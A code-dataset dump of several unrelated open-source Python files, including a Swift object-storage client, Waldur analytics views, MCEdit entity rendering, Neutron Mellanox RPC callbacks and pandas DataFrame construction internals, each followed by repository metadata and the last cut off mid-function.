def head_object(url, token, container, name, http_conn=None):
"""
Get object info
:param url: storage URL
:param token: auth token
:param container: container name that the object is in
:param name: object name to get info for
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:returns: a dict containing the response's headers (all header names will
be lowercase)
:raises ClientException: HTTP HEAD request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s/%s' % (parsed.path, quote(container), quote(name))
conn.request('HEAD', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object HEAD failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers
def put_object(url, token=None, container=None, name=None, contents=None,
content_length=None, etag=None, chunk_size=65536,
content_type=None, headers=None, http_conn=None, proxy=None):
"""
Put an object
:param url: storage URL
:param token: auth token; if None, no token will be sent
:param container: container name that the object is in; if None, the
container name is expected to be part of the url
:param name: object name to put; if None, the object name is expected to be
part of the url
:param contents: a string or a file like object to read object data from;
if None, a zero-byte put will be done
:param content_length: value to send as content-length header; also limits
the amount read from contents; if None, it will be
computed via the contents or chunked transfer
encoding will be used
:param etag: etag of contents; if None, no etag will be sent
:param chunk_size: chunk size of data to write; default 65536
:param content_type: value to send as content-type header; if None, no
content-type will be set (remote end will likely try
to auto-detect it)
:param headers: additional headers to include in the request, if any
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param proxy: proxy to connect through, if any; None by default; str of the
format 'http://127.0.0.1:8888' to set one
:returns: etag from server response
:raises ClientException: HTTP PUT request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url, proxy=proxy)
path = parsed.path
if container:
path = '%s/%s' % (path.rstrip('/'), quote(container))
if name:
path = '%s/%s' % (path.rstrip('/'), quote(name))
if headers:
headers = dict(headers)
else:
headers = {}
if token:
headers['X-Auth-Token'] = token
if etag:
headers['ETag'] = etag.strip('"')
if content_length is not None:
headers['Content-Length'] = str(content_length)
else:
for n, v in headers.iteritems():
if n.lower() == 'content-length':
content_length = int(v)
if content_type is not None:
headers['Content-Type'] = content_type
if not contents:
headers['Content-Length'] = '0'
if hasattr(contents, 'read'):
conn.putrequest('PUT', path)
for header, value in headers.iteritems():
conn.putheader(header, value)
if content_length is None:
conn.putheader('Transfer-Encoding', 'chunked')
conn.endheaders()
chunk = contents.read(chunk_size)
while chunk:
conn.send('%x\r\n%s\r\n' % (len(chunk), chunk))
chunk = contents.read(chunk_size)
conn.send('0\r\n\r\n')
else:
conn.endheaders()
left = content_length
while left > 0:
size = chunk_size
if size > left:
size = left
chunk = contents.read(size)
conn.send(chunk)
left -= len(chunk)
else:
conn.request('PUT', path, contents, headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object PUT failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
return resp.getheader('etag', '').strip('"')
def post_object(url, token, container, name, headers, http_conn=None):
"""
Update object metadata
:param url: storage URL
:param token: auth token
:param container: container name that the object is in
:param name: name of the object to update
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP POST request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s/%s' % (parsed.path, quote(container), quote(name))
headers['X-Auth-Token'] = token
conn.request('POST', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object POST failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
def delete_object(url, token=None, container=None, name=None, http_conn=None,
headers=None, proxy=None):
"""
Delete object
:param url: storage URL
:param token: auth token; if None, no token will be sent
:param container: container name that the object is in; if None, the
container name is expected to be part of the url
:param name: object name to delete; if None, the object name is expected to
be part of the url
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param headers: additional headers to include in the request
:param proxy: proxy to connect through, if any; None by default; str of the
format 'http://127.0.0.1:8888' to set one
:raises ClientException: HTTP DELETE request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url, proxy=proxy)
path = parsed.path
if container:
path = '%s/%s' % (path.rstrip('/'), quote(container))
if name:
path = '%s/%s' % (path.rstrip('/'), quote(name))
if headers:
headers = dict(headers)
else:
headers = {}
if token:
headers['X-Auth-Token'] = token
conn.request('DELETE', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object DELETE failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
class Connection(object):
"""Convenience class to make requests that will also retry the request"""
def __init__(self, authurl, user, key, retries=5, preauthurl=None,
preauthtoken=None, snet=False, starting_backoff=1):
"""
:param authurl: authenitcation URL
:param user: user name to authenticate as
:param key: key/password to authenticate with
:param retries: Number of times to retry the request before failing
:param preauthurl: storage URL (if you have already authenticated)
:param preauthtoken: authentication token (if you have already
authenticated)
:param snet: use SERVICENET internal network default is False
"""
self.authurl = authurl
self.user = user
self.key = key
self.retries = retries
self.http_conn = None
self.url = preauthurl
self.token = preauthtoken
self.attempts = 0
self.snet = snet
self.starting_backoff = starting_backoff
def get_auth(self):
return get_auth(self.authurl, self.user, self.key, snet=self.snet)
def http_connection(self):
return http_connection(self.url)
def _retry(self, reset_func, func, *args, **kwargs):
self.attempts = 0
backoff = self.starting_backoff
while self.attempts <= self.retries:
self.attempts += 1
try:
if not self.url or not self.token:
self.url, self.token = self.get_auth()
self.http_conn = None
if not self.http_conn:
self.http_conn = self.http_connection()
kwargs['http_conn'] = self.http_conn
rv = func(self.url, self.token, *args, **kwargs)
return rv
except (socket.error, HTTPException):
if self.attempts > self.retries:
raise
self.http_conn = None
except ClientException, err:
if self.attempts > self.retries:
raise
if err.http_status == 401:
self.url = self.token = None
if self.attempts > 1:
raise
elif err.http_status == 408:
self.http_conn = None
elif 500 <= err.http_status <= 599:
pass
else:
raise
sleep(backoff)
backoff *= 2
if reset_func:
reset_func(func, *args, **kwargs)
def head_account(self):
"""Wrapper for :func:`head_account`"""
return self._retry(None, head_account)
def get_account(self, marker=None, limit=None, prefix=None,
full_listing=False):
"""Wrapper for :func:`get_account`"""
# TODO(unknown): With full_listing=True this will restart the entire
# listing with each retry. Need to make a better version that just
# retries where it left off.
return self._retry(None, get_account, marker=marker, limit=limit,
prefix=prefix, full_listing=full_listing)
def post_account(self, headers):
"""Wrapper for :func:`post_account`"""
return self._retry(None, post_account, headers)
def head_container(self, container):
"""Wrapper for :func:`head_container`"""
return self._retry(None, head_container, container)
def get_container(self, container, marker=None, limit=None, prefix=None,
delimiter=None, full_listing=False):
"""Wrapper for :func:`get_container`"""
# TODO(unknown): With full_listing=True this will restart the entire
# listing with each retry. Need to make a better version that just
# retries where it left off.
return self._retry(None, get_container, container, marker=marker,
limit=limit, prefix=prefix, delimiter=delimiter,
full_listing=full_listing)
def put_container(self, container, headers=None):
"""Wrapper for :func:`put_container`"""
return self._retry(None, put_container, container, headers=headers)
def post_container(self, container, headers):
"""Wrapper for :func:`post_container`"""
return self._retry(None, post_container, container, headers)
def delete_container(self, container):
"""Wrapper for :func:`delete_container`"""
return self._retry(None, delete_container, container)
def head_object(self, container, obj):
"""Wrapper for :func:`head_object`"""
return self._retry(None, head_object, container, obj)
def get_object(self, container, obj, resp_chunk_size=None):
"""Wrapper for :func:`get_object`"""
return self._retry(None, get_object, container, obj,
resp_chunk_size=resp_chunk_size)
def put_object(self, container, obj, contents, content_length=None,
etag=None, chunk_size=65536, content_type=None,
headers=None):
"""Wrapper for :func:`put_object`"""
def _default_reset(*args, **kwargs):
raise ClientException('put_object(%r, %r, ...) failure and no '
'ability to reset contents for reupload.' % (container, obj))
reset_func = _default_reset
tell = getattr(contents, 'tell', None)
seek = getattr(contents, 'seek', None)
if tell and seek:
orig_pos = tell()
reset_func = lambda *a, **k: seek(orig_pos)
elif not contents:
reset_func = lambda *a, **k: None
return self._retry(reset_func, put_object, container, obj, contents,
content_length=content_length, etag=etag, chunk_size=chunk_size,
content_type=content_type, headers=headers)
def post_object(self, container, obj, headers):
"""Wrapper for :func:`post_object`"""
return self._retry(None, post_object, container, obj, headers)
def delete_object(self, container, obj):
"""Wrapper for :func:`delete_object`"""
return self._retry(None, delete_object, container, obj)
|
apache-2.0
| -1,593,031,386,800,875,800
| 37.313703
| 79
| 0.593627
| false
| 4.150534
| false
| false
| false
|
opennode/waldur-mastermind
|
src/waldur_mastermind/analytics/views.py
|
1
|
3899
|
import collections
from datetime import timedelta
from django.contrib.contenttypes.models import ContentType
from django.db.models.expressions import OuterRef, Subquery
from rest_framework import status, viewsets
from rest_framework.response import Response
from waldur_core.quotas.models import Quota
from waldur_core.structure.models import Project
from waldur_mastermind.billing.models import PriceEstimate
from waldur_mastermind.invoices.models import InvoiceItem
from waldur_mastermind.invoices.utils import get_current_month, get_current_year
from . import models, serializers
class DailyQuotaHistoryViewSet(viewsets.GenericViewSet):
# Fix for schema generation
queryset = []
def list(self, request):
serializer = serializers.DailyHistoryQuotaSerializer(
data=request.query_params, context={'request': request},
)
serializer.is_valid(raise_exception=True)
result = self.get_result(serializer.validated_data)
return Response(result)
def get_result(self, query):
scope = query['scope']
quota_names = query['quota_names']
start = query['start']
end = query['end']
quotas = models.DailyQuotaHistory.objects.filter(
scope=scope, name__in=quota_names, date__gte=start, date__lte=end,
).only('name', 'date', 'usage',)
charts = collections.defaultdict(dict)
for quota in quotas:
charts[quota.name][quota.date] = quota.usage
values = collections.defaultdict(list)
day = timedelta(days=1)
days = (end - start).days
for name in quota_names:
usage = 0
for i in range(days + 1):
date = start + i * day
usage = charts[name].get(date, usage)
values[name].append(usage)
return values
class ProjectQuotasViewSet(viewsets.GenericViewSet):
# Fix for schema generation
queryset = []
def list(self, request):
quota_name = request.query_params.get('quota_name')
if not quota_name:
return Response(status=status.HTTP_400_BAD_REQUEST)
content_type = ContentType.objects.get_for_model(Project)
if quota_name == 'estimated_price':
projects = self.annotate_estimated_price(content_type)
elif quota_name == 'current_price':
projects = self.annotate_current_price(content_type)
else:
projects = self.annotate_quotas(quota_name, content_type)
return Response(
[
{
'project_name': project.name,
'customer_name': project.customer.name,
'customer_abbreviation': project.customer.abbreviation,
'value': project.value,
}
for project in projects
]
)
def annotate_quotas(self, quota_name, content_type):
quotas = Quota.objects.filter(
object_id=OuterRef('pk'), content_type=content_type, name=quota_name,
)
subquery = Subquery(quotas.values('usage')[:1])
return Project.objects.annotate(value=subquery)
def annotate_estimated_price(self, content_type):
estimates = PriceEstimate.objects.filter(
object_id=OuterRef('pk'), content_type=content_type,
)
subquery = Subquery(estimates.values('total')[:1])
return Project.objects.annotate(value=subquery)
def annotate_current_price(self, content_type):
projects = Project.objects.all()
year, month = get_current_year(), get_current_month()
for project in projects:
items = InvoiceItem.objects.filter(
invoice__year=year, invoice__month=month, project_id=project.id
)
project.value = sum(item.price_current for item in items)
return projects
|
mit
| -5,358,902,503,370,012,000
| 35.783019
| 81
| 0.631957
| false
| 4.192473
| false
| false
| false
|
Rubisk/mcedit2
|
src/mcedit2/rendering/chunkmeshes/entitymesh.py
|
1
|
4131
|
"""
${NAME}
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy
from mcedit2.rendering import renderstates, scenegraph
from mcedit2.rendering.blockmeshes import standardCubeTemplates
from mcedit2.rendering.blockmeshes import ChunkMeshBase
from mcedit2.rendering.layers import Layer
from mcedit2.rendering.slices import _XYZ
from mcedit2.rendering.vertexarraybuffer import QuadVertexArrayBuffer
log = logging.getLogger(__name__)
class EntityMeshBase(ChunkMeshBase):
renderstate = renderstates.RenderstateEntityNode
detailLevels = (0, 1, 2)
def _computeVertices(self, positions, colors, offset=False, chunkPosition=(0, 0)):
cx, cz = chunkPosition
x = cx << 4
z = cz << 4
bounds = self.chunkUpdate.updateTask.worldScene.bounds
if bounds:
positions = [p for p in positions if p in bounds]
vertexBuffer = QuadVertexArrayBuffer(len(positions) * 6, lights=False, textures=False)
vertexBuffer.buffer.shape = (len(positions), 6) + vertexBuffer.buffer.shape[-2:]
if len(positions):
positions = numpy.array(positions, dtype=float)
positions[:, (0, 2)] -= (x, z)
if offset:
positions -= 0.5
vertexBuffer.rgba[:] = colors
vertexBuffer.vertex[:] = positions[:, numpy.newaxis, numpy.newaxis, :]
vertexBuffer.vertex[:] += standardCubeTemplates[_XYZ]
vertexBuffer.buffer.shape = (len(positions) * 6, ) + vertexBuffer.buffer.shape[-2:]
return vertexBuffer
class TileEntityMesh(EntityMeshBase):
layer = Layer.TileEntities
def makeChunkVertices(self, chunk, limitBox):
tilePositions = []
for i, ref in enumerate(chunk.TileEntities):
if i % 10 == 0:
yield
if limitBox and ref.Position not in limitBox:
continue
tilePositions.append(ref.Position)
tiles = self._computeVertices(tilePositions, (0xff, 0xff, 0x33, 0x44), chunkPosition=chunk.chunkPosition)
yield
self.sceneNode = scenegraph.VertexNode(tiles)
class MonsterRenderer(EntityMeshBase):
layer = Layer.Entities # xxx Monsters
notMonsters = {"Item", "XPOrb", "Painting"}
def makeChunkVertices(self, chunk, limitBox):
monsterPositions = []
for i, entityRef in enumerate(chunk.Entities):
if i % 10 == 0:
yield
ID = entityRef.id
if ID in self.notMonsters:
continue
pos = entityRef.Position
if limitBox and pos not in limitBox:
continue
monsterPositions.append(pos)
monsters = self._computeVertices(monsterPositions,
(0xff, 0x22, 0x22, 0x44),
offset=True,
chunkPosition=chunk.chunkPosition)
yield
self.sceneNode = scenegraph.VertexNode(monsters)
class ItemRenderer(EntityMeshBase):
layer = Layer.Items
def makeChunkVertices(self, chunk, limitBox):
entityPositions = []
entityColors = []
colorMap = {
"Item": (0x22, 0xff, 0x22, 0x5f),
"XPOrb": (0x88, 0xff, 0x88, 0x5f),
"Painting": (134, 96, 67, 0x5f),
}
for i, entityRef in enumerate(chunk.Entities):
if i % 10 == 0:
yield
color = colorMap.get(entityRef.id)
if color is None:
continue
pos = entityRef.Position
if limitBox and pos not in limitBox:
continue
entityPositions.append(pos)
entityColors.append(color)
items = self._computeVertices(entityPositions,
numpy.array(entityColors, dtype='uint8')[:, numpy.newaxis, numpy.newaxis],
offset=True, chunkPosition=chunk.chunkPosition)
yield
self.sceneNode = scenegraph.VertexNode(items)
|
bsd-3-clause
| 7,563,492,981,460,571,000
| 33.140496
| 115
| 0.595013
| false
| 4.181174
| false
| false
| false
|
CingHu/neutron-ustack
|
neutron/plugins/mlnx/rpc_callbacks.py
|
1
|
4229
|
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo.config import cfg
from neutron.common import constants as q_const
from neutron.common import rpc as n_rpc
from neutron.db import api as db_api
from neutron.openstack.common import log as logging
from neutron.plugins.mlnx.db import mlnx_db_v2 as db
LOG = logging.getLogger(__name__)
class MlnxRpcCallbacks(n_rpc.RpcCallback):
# History
# 1.1 Support Security Group RPC
# 1.2 Support get_devices_details_list
RPC_API_VERSION = '1.2'
def get_device_details(self, rpc_context, **kwargs):
"""Agent requests device details."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
LOG.debug(_("Device %(device)s details requested from %(agent_id)s"),
{'device': device, 'agent_id': agent_id})
port = self.get_port_from_device(device)
if port:
binding = db.get_network_binding(db_api.get_session(),
port['network_id'])
entry = {'device': device,
'physical_network': binding.physical_network,
'network_type': binding.network_type,
'segmentation_id': binding.segmentation_id,
'network_id': port['network_id'],
'port_mac': port['mac_address'],
'port_id': port['id'],
'admin_state_up': port['admin_state_up']}
if cfg.CONF.AGENT.rpc_support_old_agents:
entry['vlan_id'] = binding.segmentation_id
new_status = (q_const.PORT_STATUS_ACTIVE if port['admin_state_up']
else q_const.PORT_STATUS_DOWN)
if port['status'] != new_status:
db.set_port_status(port['id'], new_status)
else:
entry = {'device': device}
LOG.debug(_("%s can not be found in database"), device)
return entry
def get_devices_details_list(self, rpc_context, **kwargs):
return [
self.get_device_details(
rpc_context,
device=device,
**kwargs
)
for device in kwargs.pop('devices', [])
]
def update_device_down(self, rpc_context, **kwargs):
"""Device no longer exists on agent."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
LOG.debug(_("Device %(device)s no longer exists on %(agent_id)s"),
{'device': device, 'agent_id': agent_id})
port = self.get_port_from_device(device)
if port:
entry = {'device': device,
'exists': True}
if port['status'] != q_const.PORT_STATUS_DOWN:
# Set port status to DOWN
db.set_port_status(port['id'], q_const.PORT_STATUS_DOWN)
else:
entry = {'device': device,
'exists': False}
LOG.debug(_("%s can not be found in database"), device)
return entry
def update_device_up(self, rpc_context, **kwargs):
"""Device is up on agent."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
LOG.debug(_("Device %(device)s up %(agent_id)s"),
{'device': device, 'agent_id': agent_id})
port = self.get_port_from_device(device)
if port:
if port['status'] != q_const.PORT_STATUS_ACTIVE:
# Set port status to ACTIVE
db.set_port_status(port['id'], q_const.PORT_STATUS_ACTIVE)
else:
LOG.debug(_("%s can not be found in database"), device)
|
apache-2.0
| 123,379,875,097,202,480
| 40.460784
| 78
| 0.569402
| false
| 4.031459
| false
| false
| false
|
datapythonista/pandas
|
pandas/core/internals/construction.py
|
1
|
31013
|
"""
Functions for preparing various inputs passed to the DataFrame or Series
constructors before passing them to a BlockManager.
"""
from __future__ import annotations
from collections import abc
from typing import (
TYPE_CHECKING,
Any,
Hashable,
Sequence,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._libs import lib
from pandas._typing import (
ArrayLike,
DtypeObj,
Manager,
)
from pandas.errors import IntCastingNaNError
from pandas.core.dtypes.cast import (
construct_1d_arraylike_from_scalar,
construct_1d_ndarray_preserving_na,
dict_compat,
maybe_cast_to_datetime,
maybe_convert_platform,
maybe_infer_to_datetimelike,
maybe_upcast,
)
from pandas.core.dtypes.common import (
is_1d_only_ea_dtype,
is_datetime64tz_dtype,
is_datetime_or_timedelta_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_named_tuple,
is_object_dtype,
)
from pandas.core.dtypes.dtypes import ExtensionDtype
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeIndex,
ABCIndex,
ABCSeries,
ABCTimedeltaIndex,
)
from pandas.core import (
algorithms,
common as com,
)
from pandas.core.arrays import (
Categorical,
DatetimeArray,
ExtensionArray,
TimedeltaArray,
)
from pandas.core.construction import (
ensure_wrapped_if_datetimelike,
extract_array,
range_to_ndarray,
sanitize_array,
)
from pandas.core.indexes import base as ibase
from pandas.core.indexes.api import (
Index,
ensure_index,
get_objs_combined_axis,
union_indexes,
)
from pandas.core.internals.array_manager import (
ArrayManager,
SingleArrayManager,
)
from pandas.core.internals.blocks import (
ensure_block_shape,
new_block,
)
from pandas.core.internals.managers import (
BlockManager,
SingleBlockManager,
create_block_manager_from_arrays,
create_block_manager_from_blocks,
)
if TYPE_CHECKING:
from numpy.ma.mrecords import MaskedRecords
# ---------------------------------------------------------------------
# BlockManager Interface
def arrays_to_mgr(
arrays,
arr_names,
index,
columns,
*,
dtype: DtypeObj | None = None,
verify_integrity: bool = True,
typ: str | None = None,
consolidate: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
arr_names = ensure_index(arr_names)
if verify_integrity:
# figure out the index, if necessary
if index is None:
index = _extract_index(arrays)
else:
index = ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
else:
index = ensure_index(index)
columns = ensure_index(columns)
# from BlockManager perspective
axes = [columns, index]
if typ == "block":
return create_block_manager_from_arrays(
arrays, arr_names, axes, consolidate=consolidate
)
elif typ == "array":
if len(columns) != len(arrays):
assert len(arrays) == 0
arrays = [np.array([], dtype=object) for _ in range(len(columns))]
return ArrayManager(arrays, [index, columns])
else:
raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
def rec_array_to_mgr(
data: MaskedRecords | np.recarray | np.ndarray,
index,
columns,
dtype: DtypeObj | None,
copy: bool,
typ: str,
):
"""
Extract from a masked rec array and create the manager.
"""
# essentially process a record array then fill it
fdata = ma.getdata(data)
if index is None:
index = _get_names_from_index(fdata)
else:
index = ensure_index(index)
if columns is not None:
columns = ensure_index(columns)
arrays, arr_columns = to_arrays(fdata, columns)
# fill if needed
if isinstance(data, np.ma.MaskedArray):
new_arrays = fill_masked_arrays(data, arr_columns)
else:
# error: Incompatible types in assignment (expression has type
# "List[ExtensionArray]", variable has type "List[ndarray]")
new_arrays = arrays # type: ignore[assignment]
# create the manager
# error: Argument 1 to "reorder_arrays" has incompatible type "List[ndarray]";
# expected "List[ExtensionArray]"
arrays, arr_columns = reorder_arrays(
new_arrays, arr_columns, columns # type: ignore[arg-type]
)
if columns is None:
columns = arr_columns
mgr = arrays_to_mgr(arrays, arr_columns, index, columns, dtype=dtype, typ=typ)
if copy:
mgr = mgr.copy()
return mgr
def fill_masked_arrays(data: MaskedRecords, arr_columns: Index) -> list[np.ndarray]:
"""
Convert numpy MaskedRecords to ensure mask is softened.
"""
new_arrays = []
for col in arr_columns:
arr = data[col]
fv = arr.fill_value
mask = ma.getmaskarray(arr)
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
return new_arrays
def mgr_to_mgr(mgr, typ: str, copy: bool = True):
"""
Convert to specific type of Manager. Does not copy if the type is already
correct. Does not guarantee a copy otherwise. `copy` keyword only controls
whether conversion from Block->ArrayManager copies the 1D arrays.
"""
new_mgr: Manager
if typ == "block":
if isinstance(mgr, BlockManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
new_mgr = arrays_to_mgr(
mgr.arrays, mgr.axes[0], mgr.axes[1], mgr.axes[0], typ="block"
)
else:
new_mgr = SingleBlockManager.from_array(mgr.arrays[0], mgr.index)
elif typ == "array":
if isinstance(mgr, ArrayManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
arrays = [mgr.iget_values(i) for i in range(len(mgr.axes[0]))]
if copy:
arrays = [arr.copy() for arr in arrays]
new_mgr = ArrayManager(arrays, [mgr.axes[1], mgr.axes[0]])
else:
array = mgr.internal_values()
if copy:
array = array.copy()
new_mgr = SingleArrayManager([array], [mgr.index])
else:
raise ValueError(f"'typ' needs to be one of {{'block', 'array'}}, got '{typ}'")
return new_mgr
# ---------------------------------------------------------------------
# DataFrame Constructor Interface
def ndarray_to_mgr(
values, index, columns, dtype: DtypeObj | None, copy: bool, typ: str
) -> Manager:
# used in DataFrame.__init__
# input must be a ndarray, list, Series, Index, ExtensionArray
if isinstance(values, ABCSeries):
if columns is None:
if values.name is not None:
columns = Index([values.name])
if index is None:
index = values.index
else:
values = values.reindex(index)
# zero len case (GH #2234)
if not len(values) and columns is not None and len(columns):
values = np.empty((0, 1), dtype=object)
vdtype = getattr(values, "dtype", None)
if is_1d_only_ea_dtype(vdtype) or isinstance(dtype, ExtensionDtype):
# GH#19157
if isinstance(values, np.ndarray) and values.ndim > 1:
# GH#12513 a EA dtype passed with a 2D array, split into
# multiple EAs that view the values
values = [values[:, n] for n in range(values.shape[1])]
else:
values = [values]
if columns is None:
columns = Index(range(len(values)))
return arrays_to_mgr(values, columns, index, columns, dtype=dtype, typ=typ)
if is_extension_array_dtype(vdtype) and not is_1d_only_ea_dtype(vdtype):
# i.e. Datetime64TZ
values = extract_array(values, extract_numpy=True)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape(-1, 1)
else:
# by definition an array here
# the dtypes will be coerced to a single dtype
values = _prep_ndarray(values, copy=copy)
if dtype is not None and not is_dtype_equal(values.dtype, dtype):
shape = values.shape
flat = values.ravel()
if not is_integer_dtype(dtype):
# TODO: skipping integer_dtype is needed to keep the tests passing,
# not clear it is correct
# Note: we really only need _try_cast, but keeping to exposed funcs
values = sanitize_array(
flat, None, dtype=dtype, copy=copy, raise_cast_failure=True
)
else:
try:
values = construct_1d_ndarray_preserving_na(
flat, dtype=dtype, copy=False
)
except IntCastingNaNError:
# following Series, we ignore the dtype and retain floating
# values instead of casting nans to meaningless ints
pass
values = values.reshape(shape)
# _prep_ndarray ensures that values.ndim == 2 at this point
index, columns = _get_axes(
values.shape[0], values.shape[1], index=index, columns=columns
)
_check_values_indices_shape_match(values, index, columns)
if typ == "array":
if issubclass(values.dtype.type, str):
values = np.array(values, dtype=object)
if dtype is None and is_object_dtype(values.dtype):
arrays = [
ensure_wrapped_if_datetimelike(
maybe_infer_to_datetimelike(values[:, i].copy())
)
for i in range(values.shape[1])
]
else:
if is_datetime_or_timedelta_dtype(values.dtype):
values = ensure_wrapped_if_datetimelike(values)
arrays = [values[:, i].copy() for i in range(values.shape[1])]
return ArrayManager(arrays, [index, columns], verify_integrity=False)
values = values.T
# if we don't have a dtype specified, then try to convert objects
# on the entire block; this is to convert if we have datetimelike's
# embedded in an object type
if dtype is None and is_object_dtype(values.dtype):
if values.ndim == 2 and values.shape[0] != 1:
# transpose and separate blocks
dtlike_vals = [maybe_infer_to_datetimelike(row) for row in values]
dvals_list = [ensure_block_shape(dval, 2) for dval in dtlike_vals]
# TODO: What about re-joining object columns?
block_values = [
new_block(dvals_list[n], placement=n, ndim=2)
for n in range(len(dvals_list))
]
else:
datelike_vals = maybe_infer_to_datetimelike(values)
nb = new_block(datelike_vals, placement=slice(len(columns)), ndim=2)
block_values = [nb]
else:
nb = new_block(values, placement=slice(len(columns)), ndim=2)
block_values = [nb]
if len(columns) == 0:
block_values = []
return create_block_manager_from_blocks(block_values, [columns, index])
def _check_values_indices_shape_match(
values: np.ndarray, index: Index, columns: Index
) -> None:
"""
Check that the shape implied by our axes matches the actual shape of the
data.
"""
if values.shape[1] != len(columns) or values.shape[0] != len(index):
# Could let this raise in Block constructor, but we get a more
# helpful exception message this way.
if values.shape[0] == 0:
raise ValueError("Empty data passed with indices specified.")
passed = values.shape
implied = (len(index), len(columns))
raise ValueError(f"Shape of passed values is {passed}, indices imply {implied}")
def dict_to_mgr(
data: dict,
index,
columns,
*,
dtype: DtypeObj | None = None,
typ: str = "block",
copy: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
Used in DataFrame.__init__
"""
arrays: Sequence[Any] | Series
if columns is not None:
from pandas.core.series import Series
arrays = Series(data, index=columns, dtype=object)
data_names = arrays.index
missing = arrays.isna()
if index is None:
# GH10856
# raise ValueError if only scalars in dict
index = _extract_index(arrays[~missing])
else:
index = ensure_index(index)
# no obvious "empty" int column
if missing.any() and not is_integer_dtype(dtype):
nan_dtype: DtypeObj
if dtype is None or (
isinstance(dtype, np.dtype) and np.issubdtype(dtype, np.flexible)
):
# GH#1783
nan_dtype = np.dtype("object")
else:
nan_dtype = dtype
val = construct_1d_arraylike_from_scalar(np.nan, len(index), nan_dtype)
arrays.loc[missing] = [val] * missing.sum()
arrays = list(arrays)
else:
keys = list(data.keys())
columns = data_names = Index(keys)
arrays = [com.maybe_iterable_to_list(data[k]) for k in keys]
# GH#24096 need copy to be deep for datetime64tz case
# TODO: See if we can avoid these copies
arrays = [arr if not isinstance(arr, ABCIndex) else arr._data for arr in arrays]
arrays = [
arr if not is_datetime64tz_dtype(arr) else arr.copy() for arr in arrays
]
if copy:
# arrays_to_mgr (via form_blocks) won't make copies for EAs
# dtype attr check to exclude EADtype-castable strs
arrays = [
x
if not hasattr(x, "dtype") or not isinstance(x.dtype, ExtensionDtype)
else x.copy()
for x in arrays
]
# TODO: can we get rid of the dt64tz special case above?
return arrays_to_mgr(
arrays, data_names, index, columns, dtype=dtype, typ=typ, consolidate=copy
)
def nested_data_to_arrays(
data: Sequence,
columns: Index | None,
index: Index | None,
dtype: DtypeObj | None,
):
"""
Convert a single sequence of arrays to multiple arrays.
"""
# By the time we get here we have already checked treat_as_nested(data)
if is_named_tuple(data[0]) and columns is None:
columns = ensure_index(data[0]._fields)
arrays, columns = to_arrays(data, columns, dtype=dtype)
columns = ensure_index(columns)
if index is None:
if isinstance(data[0], ABCSeries):
index = _get_names_from_index(data)
elif isinstance(data[0], Categorical):
# GH#38845 hit in test_constructor_categorical
index = ibase.default_index(len(data[0]))
else:
index = ibase.default_index(len(data))
return arrays, columns, index
def treat_as_nested(data) -> bool:
"""
Check if we should use nested_data_to_arrays.
"""
return (
len(data) > 0
and is_list_like(data[0])
and getattr(data[0], "ndim", 1) == 1
and not (isinstance(data, ExtensionArray) and data.ndim == 2)
)
# ---------------------------------------------------------------------
def _prep_ndarray(values, copy: bool = True) -> np.ndarray:
if isinstance(values, TimedeltaArray) or (
isinstance(values, DatetimeArray) and values.tz is None
):
# On older numpy, np.asarray below apparently does not call __array__,
# so nanoseconds get dropped.
values = values._ndarray
if not isinstance(values, (np.ndarray, ABCSeries, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
elif isinstance(values, range):
arr = range_to_ndarray(values)
return arr[..., np.newaxis]
def convert(v):
if not is_list_like(v) or isinstance(v, ABCDataFrame):
return v
elif not hasattr(v, "dtype") and not isinstance(v, (list, tuple, range)):
